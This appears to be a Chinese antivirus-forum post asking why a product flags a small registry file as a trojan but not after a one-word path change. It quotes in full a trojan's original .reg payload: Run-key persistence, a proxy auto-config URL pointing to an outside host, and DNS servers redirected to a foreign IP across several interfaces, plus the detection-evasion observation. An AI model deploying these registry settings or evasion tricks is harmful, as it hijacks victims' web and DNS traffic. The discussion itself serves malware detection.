本帖最后由 swizzer 于 2020-10-15 23:42 编辑
- Windows Registry Editor Version 5.00
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "dk"="C:\\Program File\\alllh\\au.exe"
复制代码
把这一段文本保存为reg后双击,智量主防识别为WIBD:HEUR.Trojan.KA;
若把其中把File改为Files则不报?
@智量官方
相关截图:
难道模型该调整了?
------------------------------------
本reg的最初面貌:(来自@落华无痕 提供的sf白加黑木马)
- Windows Registry Editor Version 5.00
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "DX报错服务"="D:\\$aa\\allilh\\allilhzu.exe"
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
- "IE5_UA_Backup_Flag"="5.0"
- "User Agent"="Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
- "EmailName"="User@"
- "PrivDiscUiShown"=dword:00000001
- "EnableHttp1_1"=dword:00000001
- "WarnOnIntranet"=dword:00000001
- "MimeExclusionListForCache"="multipart/mixed multipart/x-mixed-replace multipart/x-byteranges "
- "AutoConfigProxy"="wininet.dll"
- "UseSchannelDirectly"=hex:01,00,00,00
- "DisableCachingOfSSLPages"=dword:00000000
- "WarnonZoneCrossing"=dword:00000000
- "CertificateRevocation"=dword:00000001
- "WarnOnPost"=hex:01,00,00,00
- "UrlEncoding"=dword:00000000
- "SecureProtocols"=dword:00000a80
- "PrivacyAdvanced"=dword:00000000
- "EnableNegotiate"=dword:00000001
- "MigrateProxy"=dword:00000001
- "ProxyEnable"=dword:00000000
- "AutoConfigURL"="http://hetiancheng.sn.cn:777/"
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
- "DefaultConnectionSettings"=hex:46,00,00,00,08,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
- "SavedLegacySettings"=hex:46,00,00,00,0e,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6142CFD7-29A4-45B8-B72F-ACF97FB71AF5}]
- "NameServer"="119.28.117.205,114.114.114.114"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{622CA10C-0B29-46A7-BE8A-420CE93BD16B}]
- "NameServer"="119.28.117.205,114.114.114.114"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}]
- "NameServer"="119.28.117.205,114.114.114.114"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE7A2601-0D55-40CF-B70E-405485F7E1CC}]
- "NameServer"="119.28.117.205,114.114.114.114"
复制代码
|